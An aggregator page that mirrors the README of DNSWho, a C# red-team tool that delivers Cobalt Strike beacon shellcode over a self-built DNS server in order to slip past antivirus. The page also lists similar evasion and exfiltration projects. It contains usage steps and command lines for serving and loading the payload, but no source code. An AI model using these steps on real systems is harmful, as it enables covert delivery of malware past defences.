GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → OlivierLaflamme → DNSWho

OlivierLaflamme / DNSWho

Licence: other
transmit cs beacon (shellcode) over self-made dns to avoid anti-kill and AV

Programming Languages

C#
18002 projects

Labels

dnsbeaconevasionbypass-avexfiltrationbypass-antivirusantivirus-evasionredteamcobaltstrikeevasion-attack

Projects that are alternatives of or similar to DNSWho

MsfMania
Python AV Evasion Tools
Stars: ✭ 388 (+725.53%)
Mutual labels:  evasion, bypass-antivirus, antivirus-evasion, redteam
Lscript
The LAZY script will make your life easier, and of course faster.
Stars: ✭ 3,056 (+6402.13%)
Mutual labels:  bypass-av, bypass-antivirus, antivirus-evasion
trolo
trolo - an easy to use script for generating Payloads that bypasses antivirus
Stars: ✭ 45 (-4.26%)
Mutual labels:  bypass-av, bypass-antivirus
GolangBypassAV
研究利用golang各种姿势bypassAV
Stars: ✭ 530 (+1027.66%)
Mutual labels:  bypass-av, bypass-antivirus
ScareCrow-CobaltStrike
Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)
Stars: ✭ 387 (+723.4%)
Mutual labels:  evasion, bypass-antivirus
DInvoke shellcodeload CSharp
ShellCodeLoader via DInvoke
Stars: ✭ 41 (-12.77%)
Mutual labels:  bypass-antivirus, redteam
gtfo
Search for Unix binaries that can be exploited to bypass system security restrictions.
Stars: ✭ 88 (+87.23%)
Mutual labels:  exfiltration, redteam
Evader
Packer (actually a crypter) for antivirus evasion implemented for windows PE files (BSc-Thesis)
Stars: ✭ 86 (+82.98%)
Mutual labels:  evasion, antivirus-evasion
Pezor
Open-Source PE Packer
Stars: ✭ 561 (+1093.62%)
Mutual labels:  antivirus-evasion, redteam
Xeexe Topantivirusevasion
Undetectable & Xor encrypting with custom KEY (FUD Metasploit Rat) bypass Top Antivirus like BitDefender,Malwarebytes,Avast,ESET-NOD32,AVG,... & Automatically Add ICON and MANIFEST to excitable
Stars: ✭ 387 (+723.4%)
Mutual labels:  evasion, antivirus-evasion
Hacktheworld
An Python Script For Generating Payloads that Bypasses All Antivirus so far .
Stars: ✭ 527 (+1021.28%)
Mutual labels:  evasion, antivirus-evasion
certexfil
Exfiltration based on custom X509 certificates
Stars: ✭ 18 (-61.7%)
Mutual labels:  exfiltration, redteam
NewNtdllBypassInlineHook CSharp
Load a fresh new copy of ntdll.dll via file mapping to bypass API inline hook.
Stars: ✭ 35 (-25.53%)
Mutual labels:  bypass-antivirus, redteam
Gtfobins.github.io
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Stars: ✭ 6,030 (+12729.79%)
Mutual labels:  exfiltration, redteam
HellgateLoader CSharp
Load shellcode via HELLGATE, Rewrite hellgate with .net framework for learning purpose.
Stars: ✭ 73 (+55.32%)
Mutual labels:  bypass-antivirus, redteam
Cobalt Arsenal
My collection of battle-tested Aggressor Scripts for Cobalt Strike 4.0+
Stars: ✭ 230 (+389.36%)
Mutual labels:  beacon, redteam
AggressiveGadgetToJScript
A Cobalt Strike Aggressor script to generate GadgetToJScript payloads
Stars: ✭ 90 (+91.49%)
Mutual labels:  redteam, cobaltstrike
Foureye
AV Evasion Tool For Red Team Ops
Stars: ✭ 421 (+795.74%)
Mutual labels:  antivirus-evasion, redteam
URL-obfuscator
Python Program to obfuscate URLs to make Phishing attacks more difficult to detect. Uses Active open redirect list and other URL obfuscation techniques.
Stars: ✭ 101 (+114.89%)
Mutual labels:  evasion, bypass-antivirus
Bof Regsave
Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File
Stars: ✭ 85 (+80.85%)
Mutual labels:  beacon, redteam
View All Similar Projects ➔

DNSWho

Implement a dns server = SharpDNS.exe
Implement a "client" = DnsLoader.exe

Compared with the http protocol, the dns protocol has better concealment. Analogous to the dns beacon of cs, we can implement a dns server to transmit shellcode by ourselves. C# has an excellent third-party library ARSoft.Tools.Net. We can use it for dns query and self-built dns server.

Create a new console project of .net4.0 and install ARSoft.Tools.Net. Because of the .net version problem, we need to install the lower version of ARSoft.Tools.Net. Install-Package ARSoft.Tools.Net -Version 1.8.2

image

So generate a raw cs payload if you are smart you wont make it stageless because it will be way to big.

image

Then spinup the DNS server and make sure that the length is the same in wireshark as the one displayed in the terminal. SharpDNS.exe beacon.bin
The output will look like the following:

image

image

then simply catch it DnsLoader.exe <DNS> <CDN> 2000

Note that the txt parsing of dns cannot be transmitted too much at a time, and the 2000 used in my test so that there is no problem.

image

Tada...

image

Having Issues?

If you get the following error this is because youre not running this on the same machine as your DNS. That is because svchost.exe listens to UDP53

image

Additionally dont try to change the port for the DnsServer because you cant:

image

image

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].